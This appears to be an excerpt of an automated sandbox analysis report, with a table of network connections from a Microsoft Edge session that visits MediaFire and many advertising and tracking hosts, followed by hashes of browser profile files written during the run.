| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 150.171.27.11:80 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 104.17.150.117:443 | www.mediafire.com | udp |
| US | 104.17.150.117:443 | www.mediafire.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 95.101.143.218:443 | copilot.microsoft.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 95.101.143.218:443 | copilot.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| DE | 18.245.86.111:443 | cdn.amplitude.com | tcp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| DE | 142.250.186.78:443 | translate.google.com | tcp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| US | 104.26.9.66:443 | cdn.econventa.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 34.218.159.23:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | econventa.com | udp |
| US | 8.8.8.8:53 | econventa.com | udp |
| US | 34.218.159.23:443 | api.amplitude.com | tcp |
| US | 34.218.159.23:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | www.mediafiredls.com | udp |
| US | 8.8.8.8:53 | www.mediafiredls.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | udp |
| IE | 52.17.176.88:443 | bcp.crwdcntrl.net | tcp |
| US | 104.26.3.173:443 | www.mediafiredls.com | tcp |
| DE | 65.9.66.122:443 | tags.crwdcntrl.net | tcp |
| IE | 54.220.144.202:443 | bcp.crwdcntrl.net | tcp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | tcp |
| US | 104.21.63.106:443 | www.ezojs.com | udp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| IE | 52.17.176.88:443 | bcp.crwdcntrl.net | tcp |
| US | 104.26.3.173:443 | www.mediafiredls.com | tcp |
| DE | 65.9.66.122:443 | tags.crwdcntrl.net | tcp |
| IE | 54.220.144.202:443 | bcp.crwdcntrl.net | tcp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | tcp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| US | 104.21.63.106:443 | www.ezojs.com | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| DE | 142.250.185.74:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | ag.dns-finder.com | udp |
| US | 8.8.8.8:53 | ag.dns-finder.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 104.22.4.65:443 | ad-delivery.net | tcp |
| US | 104.22.4.65:443 | ad-delivery.net | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| DE | 216.58.206.74:443 | translate-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 103.231.98.105:443 | hbopenbid.pubmatic.com | tcp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ag.dns-finder.com | udp |
| US | 8.8.8.8:53 | ag.dns-finder.com | udp |
| US | 104.21.87.79:443 | go.ezodn.com | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 95.101.143.219:443 | www.bing.com | tcp |
| DE | 142.250.186.78:443 | fundingchoicesmessages.google.com | tcp |
| DE | 142.250.186.78:443 | fundingchoicesmessages.google.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| DE | 142.250.186.99:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 142.250.186.129:443 | clients2.googleusercontent.com | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| GB | 23.192.17.43:443 | ads.pubmatic.com | tcp |
| GB | 23.192.17.43:443 | ads.pubmatic.com | tcp |
| GB | 23.192.17.43:443 | ads.pubmatic.com | tcp |
| US | 104.21.87.79:443 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| DE | 91.228.74.159:443 | secure.quantserve.com | tcp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| DE | 18.66.102.57:443 | rules.quantcount.com | tcp |
| DE | 142.250.185.74:443 | translate.googleapis.com | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 23.73.139.43:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 13.107.253.64:443 | static.edge.microsoftapp.net | tcp |
| US | 13.107.253.64:443 | static.edge.microsoftapp.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| GB | 95.101.143.219:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 95.101.143.193:443 | www.bing.com | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | affbc3598d44ad66afe43a81ceb15125.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | affbc3598d44ad66afe43a81ceb15125.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| DE | 65.9.66.97:443 | tags.crwdcntrl.net | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | connectid.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | connectid.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| DE | 142.250.186.163:443 | www.google.co.uk | udp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| DE | 91.228.74.166:443 | pixel.quantserve.com | tcp |
| DE | 142.250.185.162:443 | ep1.adtrafficquality.google | tcp |
| US | 104.22.52.86:443 | cdn.id5-sync.com | tcp |
| US | 104.22.52.86:443 | cdn.id5-sync.com | tcp |
| DE | 18.66.102.2:443 | connectid.analytics.yahoo.com | tcp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| IE | 34.249.77.178:443 | bcp.crwdcntrl.net | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 162.19.138.120:443 | id5-sync.com | tcp |
| US | 35.190.39.111:443 | esp.rtbhouse.com | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| DE | 142.250.186.33:443 | ep2.adtrafficquality.google | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| GB | 87.248.114.12:443 | ups.analytics.yahoo.com | tcp |
| US | 8.8.8.8:53 | affbc3598d44ad66afe43a81ceb15125.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | affbc3598d44ad66afe43a81ceb15125.safeframe.googlesyndication.com | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | download1339.mediafire.com | udp |
| US | 8.8.8.8:53 | download1339.mediafire.com | udp |
| US | 104.26.3.173:443 | www.mediafiredls.com | tcp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| DE | 142.250.186.97:443 | affbc3598d44ad66afe43a81ceb15125.safeframe.googlesyndication.com | udp |
| DE | 142.250.186.97:443 | affbc3598d44ad66afe43a81ceb15125.safeframe.googlesyndication.com | udp |
| BE | 64.233.166.157:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | econventa.com | udp |
| US | 8.8.8.8:53 | econventa.com | udp |
| DE | 162.19.138.120:443 | id5-sync.com | tcp |
| US | 205.196.123.27:443 | download1339.mediafire.com | tcp |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| GB | 87.248.114.12:443 | ups.analytics.yahoo.com | tcp |
| GB | 18.165.159.204:443 | cdn.prod.uidapi.com | tcp |
| US | 205.196.123.27:443 | download1339.mediafire.com | tcp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 104.26.9.66:443 | econventa.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| DE | 142.250.186.36:443 | www.google.com | udp |
| DE | 162.19.138.116:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| DE | 142.250.186.36:443 | www.google.com | udp |
| DE | 142.250.186.33:443 | ep2.adtrafficquality.google | tcp |
| US | 34.120.135.53:443 | oajs.openx.net | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| DE | 172.217.16.194:443 | googleads.g.doubleclick.net | udp |
| US | 34.120.135.53:443 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 34.98.64.218:443 | google-bidout-d.openx.net | tcp |
| US | 34.98.64.218:443 | google-bidout-d.openx.net | tcp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| DE | 142.250.186.36:443 | www.google.com | udp |
| DE | 142.250.186.42:443 | ajax.googleapis.com | udp |
| DE | 142.250.186.42:443 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| GB | 88.221.134.2:443 | www.bing.com | udp |
| US | 52.88.16.15:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| DE | 142.250.186.78:443 | translate.google.com | udp |
| US | 104.22.4.65:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| DE | 103.231.98.105:443 | hbopenbid.pubmatic.com | tcp |
| DE | 52.59.238.109:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 104.26.9.66:443 | econventa.com | udp |
| US | 104.22.4.65:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | 7b726c18ece2de5f987aaeff52b33188.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 7b726c18ece2de5f987aaeff52b33188.safeframe.googlesyndication.com | udp |
| DE | 216.58.206.65:443 | 7b726c18ece2de5f987aaeff52b33188.safeframe.googlesyndication.com | tcp |
| DE | 216.58.206.65:443 | 7b726c18ece2de5f987aaeff52b33188.safeframe.googlesyndication.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| DE | 216.58.206.65:443 | 7b726c18ece2de5f987aaeff52b33188.safeframe.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| GB | 23.192.17.43:443 | ads.pubmatic.com | tcp |
| US | 205.196.123.27:443 | download1339.mediafire.com | tcp |
| US | 104.26.9.66:443 | econventa.com | udp |
| US | 205.196.123.27:443 | download1339.mediafire.com | tcp |
| US | 205.196.123.27:443 | download1339.mediafire.com | tcp |
| DE | 142.250.186.42:443 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 95.101.143.35:443 | www.bing.com | udp |
| GB | 104.86.110.97:443 | tcp | |
| GB | 104.86.110.97:443 | tcp | |
| GB | 104.86.110.97:443 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 75d234ae1b59bb2987a874d038f7f14a |
| SHA1 | c527a2a03b563bc93536ea4c4d1febb44ec2c1d7 |
| SHA256 | 718d424934eb9738a23e8b021c79ca6ab62183b7569e5f12658512960478f6d9 |
| SHA512 | be99ed948333bb6a881d77922280413fa68dee4efbfeb853643d5aa649fef4921b2b6a693fe5b69fd5cca1685c29e55780797292426b1f6d3eb18bd4aa410859 |
\??\pipe\crashpad_5968_JFGTHSXVWUHFHNGY
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 978d790ea9bbd3b3113b1d32773304fa |
| SHA1 | 61c9b3724e684c2a0507d7c9ae294e668e6c6e58 |
| SHA256 | 36c686a276e904607d2a18c2a2fc54467fb8dc1698607f5d5a6cefb75aa513c8 |
| SHA512 | d50740255d20d2a5e6abdc78f4fe9ef6e832f2ffe9ecc200916a73db1e0dd37d67d88996b315e128bf5b77bb110e4e8c29905aa5d90b83019be2cc8127d0dfc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | 3caf83b8532d2ea7842a3e37756bdc5f |
| SHA1 | 1913781fc4cfd97e24f7d076b84aa701da8e817d |
| SHA256 | 1bb6816eba2a71d94a130c43d7b53541a8ef2d2c2ca945cabbb1efdec404988c |
| SHA512 | 5e8db452f881621e1f0652ff35a4f1e06cc0aed9c5c97e85677efb81b8c46fc40726233d098b2e11f9e18ad37c7380df3f2a6dfb03f2732053155544235cb7cd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\0f49d960-25bf-439b-8eae-e2ef7e54ba29.tmp
| MD5 | bd6c58a52af88bd60e4b42abbec3b6c0 |
| SHA1 | 46b376ed3e40523a6eea4d88f546166d34057a92 |
| SHA256 | 7d2bb34d26aa146f9c52cd5c70279c25f1847b11c625ce4d34f385b31644599b |
| SHA512 | be8294752bab018fdd3d8390886eb84aa17ff8161cc04e7fc549b22169f5dcb7e7b596ee9cf678552ff5f63a4062b11d52ec7a41e5a877f20e6f55089e4a9a0f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0a9d4b975c4486555b2ebcda136dafbd |
| SHA1 | 423843f8b6bebb862e75f8e33bf44a2d1caffb12 |
| SHA256 | 06549a02046a3410d99a4e6e9fa12901e0ee83edb1e6fa4efc752480decbfd0f |
| SHA512 | 4dbab4950f56c9ae2cea86c17d6fdf4f6c79a365656f85309f68ba02548be95417412ecfa77af782f24e969dfe4ab9524846eb2b05dea3e4cbd40bed15b4d000 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60
| MD5 | b0917d8e6c5b6be358bff67f84eb8336 |
